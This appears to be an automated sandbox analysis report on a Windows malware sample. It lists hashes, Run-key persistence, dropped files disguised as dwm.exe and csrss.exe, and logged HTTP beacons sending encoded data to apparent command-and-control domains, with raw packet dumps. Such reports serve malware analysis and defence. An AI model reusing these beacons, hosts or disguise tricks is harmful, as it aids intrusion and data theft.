Analysis Date2014-08-28 18:47:30
MD57a80a69986984d9946927c5fde6d3105
SHA1e4f137d67bfcec59a2ae3d212311df3ae1b6d552

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c75a7fa7d302ea9d649175c9d9d80a9e sha1: c1f5899f5e080091e291059279944d401579a4c9 size: 99328
Section.tls md5: c2c1dad0cacd6d7059154740e42428d3 sha1: d47482b2634d80df5728bc37e658b09b27b854ab size: 1536
Section.data md5: 36546804a32574919b76e8bb19706ca7 sha1: 8eeef43a832cf59e1cbc04341fa06a7c808c3199 size: 68096
Section.reloc md5: 9d2fcb9168dc29847c3c0ed44e488af6 sha1: a49e6757a0c611e7b30bfad47ae2166a0aa33662 size: 1024
Timestamp2005-10-13 06:36:57
PEhash3c6c7fb0a346a3c82ffbfe45a537e0cb03f593f0
IMPhasha5ae549bb5c8dd2e2ab527d0825c1df4

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS127.0.0.1
Winsock DNSjapanesegreenteaonline.com
Winsock DNShappyratatuy.com
Winsock DNSmysmallhomespace.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSjapanesegreenteaonline.com
Type: A
173.247.248.36
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNShappyratatuy.com
Type: A
DNSmysmallhomespace.com
Type: A
HTTP GEThttp://japanesegreenteaonline.com/assets/images/greentea-cha-1.gif?v41=21&tq=gKZEtzyQTHhjcmXKOcU1p2B2F%2FSJEhTSFMDlacmL91WE%2ByaIAA5SlEQfHEjzpExetvL9H5mDxDu6g%2FdE3UNn7EKJIMs3CLjsNnURBtkAY3SNqTJHch17U9X6weUc3%2BTFP8Gnx%2BIIbapGE3GYVvcWW4d8nEErwlmwa1LJA17lg0csXz7%2FMGoBr9HWVEkrVIH2XbI%2FUalfRNSHJOQFnuBD5U7RinbkPvces2oPX1t8Vs0gDSuxQuQkqFhz21SeEhNwCOQDvN8GTbp%2BuF9LuQ9tlXjG52wienD0BrriGs6F1gaqwwkcpavlRUmSUye3DJmzRVf1DYO%2FiEvqzbMrpVPUYCVetwDldPd0bTUDOag%2BCPPIdOdAVIEDhpVyt5I1SAR%2FFu0UP6ZJ9IjLYQ%2BjX934UTRW
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1tX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJsX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 173.247.248.36:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f617373 6574732f 696d6167   GET /assets/imag
0x00000010 (00016)   65732f67 7265656e 7465612d 6368612d   es/greentea-cha-
0x00000020 (00032)   312e6769 663f7634 313d3231 2674713d   1.gif?v41=21&tq=
0x00000030 (00048)   674b5a45 747a7951 5448686a 636d584b   gKZEtzyQTHhjcmXK
0x00000040 (00064)   4f635531 70324232 46253246 534a4568   OcU1p2B2F%2FSJEh
0x00000050 (00080)   5453464d 446c6163 6d4c3931 57452532   TSFMDlacmL91WE%2
0x00000060 (00096)   42796149 41413553 6c455166 48456a7a   ByaIAA5SlEQfHEjz
0x00000070 (00112)   70457865 74764c39 48356d44 78447536   pExetvL9H5mDxDu6
0x00000080 (00128)   67253246 64453355 4e6e3745 4b4a494d   g%2FdE3UNn7EKJIM
0x00000090 (00144)   7333434c 6a734e6e 55524274 6b415933   s3CLjsNnURBtkAY3
0x000000a0 (00160)   534e7154 4a486368 31375539 58367765   SNqTJHch17U9X6we
0x000000b0 (00176)   55633325 32425446 5038476e 78253242   Uc3%2BTFP8Gnx%2B
0x000000c0 (00192)   49496261 70474533 47595676 63575734   IIbapGE3GYVvcWW4
0x000000d0 (00208)   64386e45 4572776c 6d776131 4c4a4131   d8nEErwlmwa1LJA1
0x000000e0 (00224)   376c6730 6373587a 37253246 4d476f42   7lg0csXz7%2FMGoB
0x000000f0 (00240)   72394857 56456b72 56494832 58624925   r9HWVEkrVIH2XbI%
0x00000100 (00256)   32465561 6c66524e 53484a4f 51466e75   2FUalfRNSHJOQFnu
0x00000110 (00272)   42443555 3752696e 626b5076 63657332   BD5U7RinbkPvces2
0x00000120 (00288)   6f505831 74385673 30674453 75785175   oPX1t8Vs0gDSuxQu
0x00000130 (00304)   516b7146 687a3231 53654568 4e77434f   QkqFhz21SeEhNwCO
0x00000140 (00320)   5144764e 38475462 70253242 7546394c   QDvN8GTbp%2BuF9L
0x00000150 (00336)   75513974 6c586a47 35327769 656e4430   uQ9tlXjG52wienD0
0x00000160 (00352)   42727269 47733646 31676171 77776b63   BrriGs6F1gaqwwkc
0x00000170 (00368)   7061766c 52556d53 55796533 444a6d7a   pavlRUmSUye3DJmz
0x00000180 (00384)   52566631 44594f25 32466945 76717a62   RVf1DYO%2FiEvqzb
0x00000190 (00400)   4d727056 50555943 56657477 446c6450   MrpVPUYCVetwDldP
0x000001a0 (00416)   64306254 55444f61 67253242 43505049   d0bTUDOag%2BCPPI
0x000001b0 (00432)   644f6441 56494544 68705679 74354931   dOdAVIEDhpVyt5I1
0x000001c0 (00448)   53415225 32464675 30555036 5a4a3949   SAR%2FFu0UP6ZJ9I
0x000001d0 (00464)   6a4c5951 2532426a 58393334 55545257   jLYQ%2BjX934UTRW
0x000001e0 (00480)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001f0 (00496)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000200 (00512)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000210 (00528)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000220 (00544)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000230 (00560)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000240 (00576)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a74 6c586a47 35327769 656e4430   ...tlXjG52wienD0
0x00000160 (00352)   42727269 47733646 31676171 77776b63   BrriGs6F1gaqwwkc
0x00000170 (00368)   7061766c 52556d53 55796533 444a6d7a   pavlRUmSUye3DJmz
0x00000180 (00384)   52566631 44594f25 32466945 76717a62   RVf1DYO%2FiEvqzb
0x00000190 (00400)   4d727056 50555943 56657477 446c6450   MrpVPUYCVetwDldP
0x000001a0 (00416)   64306254 55444f61 67253242 43505049   d0bTUDOag%2BCPPI
0x000001b0 (00432)   644f6441 56494544 68705679 74354931   dOdAVIEDhpVyt5I1
0x000001c0 (00448)   53415225 32464675 30555036 5a4a3949   SAR%2FFu0UP6ZJ9I
0x000001d0 (00464)   6a4c5951 2532426a 58393334 55545257   jLYQ%2BjX934UTRW
0x000001e0 (00480)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001f0 (00496)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000200 (00512)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000210 (00528)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000220 (00544)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000230 (00560)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000240 (00576)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7a46 4b763937 35586c6d   X%2BSNzFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a47 35327769 656e4430   ose....G52wienD0
0x00000160 (00352)   42727269 47733646 31676171 77776b63   BrriGs6F1gaqwwkc
0x00000170 (00368)   7061766c 52556d53 55796533 444a6d7a   pavlRUmSUye3DJmz
0x00000180 (00384)   52566631 44594f25 32466945 76717a62   RVf1DYO%2FiEvqzb
0x00000190 (00400)   4d727056 50555943 56657477 446c6450   MrpVPUYCVetwDldP
0x000001a0 (00416)   64306254 55444f61 67253242 43505049   d0bTUDOag%2BCPPI
0x000001b0 (00432)   644f6441 56494544 68705679 74354931   dOdAVIEDhpVyt5I1
0x000001c0 (00448)   53415225 32464675 30555036 5a4a3949   SAR%2FFu0UP6ZJ9I
0x000001d0 (00464)   6a4c5951 2532426a 58393334 55545257   jLYQ%2BjX934UTRW
0x000001e0 (00480)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001f0 (00496)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000200 (00512)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000210 (00528)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000220 (00544)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000230 (00560)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000240 (00576)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a                  close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a47 35327769 656e4430   .......G52wienD0
0x00000160 (00352)   42727269 47733646 31676171 77776b63   BrriGs6F1gaqwwkc
0x00000170 (00368)   7061766c 52556d53 55796533 444a6d7a   pavlRUmSUye3DJmz
0x00000180 (00384)   52566631 44594f25 32466945 76717a62   RVf1DYO%2FiEvqzb
0x00000190 (00400)   4d727056 50555943 56657477 446c6450   MrpVPUYCVetwDldP
0x000001a0 (00416)   64306254 55444f61 67253242 43505049   d0bTUDOag%2BCPPI
0x000001b0 (00432)   644f6441 56494544 68705679 74354931   dOdAVIEDhpVyt5I1
0x000001c0 (00448)   53415225 32464675 30555036 5a4a3949   SAR%2FFu0UP6ZJ9I
0x000001d0 (00464)   6a4c5951 2532426a 58393334 55545257   jLYQ%2BjX934UTRW
0x000001e0 (00480)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001f0 (00496)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000200 (00512)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000210 (00528)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000220 (00544)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000230 (00560)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000240 (00576)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e786c 4b763937 35586c6d   X%2BSNxlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   31745825 32425039 68253242 49307344   1tX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a735825 3242534e 78623579 676d3143   JsX%2BSNxb5ygm1C
